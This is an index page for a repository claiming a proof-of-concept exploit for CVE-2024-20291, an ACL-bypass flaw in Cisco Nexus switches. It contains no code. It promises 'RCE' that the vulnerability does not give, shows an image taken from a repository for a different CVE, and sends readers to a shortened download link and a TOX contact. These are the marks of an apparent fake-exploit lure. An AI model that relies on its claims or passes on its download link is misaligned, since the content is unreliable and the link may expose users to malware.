CVE-2024-20291 PoC — Cisco Nexus 3000 Series Switches Security Vulnerability

Source
Associated Vulnerability
Title: Cisco Nexus 3000 Series Switches Security Vulnerability (CVE-2024-20291)
Description:A vulnerability in the access control list (ACL) programming for port channel subinterfaces of Cisco Nexus 3000 and 9000 Series Switches in standalone NX-OS mode could allow an unauthenticated, remote attacker to send traffic that should be blocked through an affected device. This vulnerability is due to incorrect hardware programming that occurs when configuration changes are made to port channel member ports. An attacker could exploit this vulnerability by attempting to send traffic through an affected device. A successful exploit could allow the attacker to access network resources that should be protected by an ACL that was applied on port channel subinterfaces.
Description
CVE-2024-20291-POC exploit ---> RCE
Readme
# CVE-2024-20291-POC

![CVE-2024-20291](https://github.com/c0d3b3af/CVE-2024-21762-POC/assets/161638405/a2a5a91a-3057-4a15-924d-8ad93a00aadb)

**Proof of Concept:** 
CVE-2024-20291 is an access control list (ACL) programming vulnerability for the port link subinterfaces of **Cisco Nexus 3000 and 9000** series switches. In NX-OS offline mode, I was able to send, remotely and unauthenticated, traffic that should be blocked through the affected device.

This vulnerability is due to hardware misprogramming that occurs when the configuration of channel member ports is changed. **The exploit successfully allows you to access network resources that need to be protected by the ACLs applied on the port channel subinterfaces.**

Judging by my attempts to replicate the exploit from scratch, it was a bit sophisticated and markedly different from previous Cisco Nexus vulnerabilities. exploit.py is an exploit that is written in Python and is capable of multithreading and IPS listing **Vulnerable Cisco Nexus 3000 and 9000** series. Before you begin, read the instructions for running in Readme.txt.

## [Download here](https://t.ly/XTt1u)

any questions in TOX: **4R7G9T2Y1F8E6W3Q1A5S7D9F2G1H3J5K7L9Z2X1C3V5B7N9M2**
File Snapshot

[4.0K] /data/pocs/c83272a8b3fdd622f28174a7ac1417ad6f25ac5a
└── [1.2K] README.md

0 directories, 1 file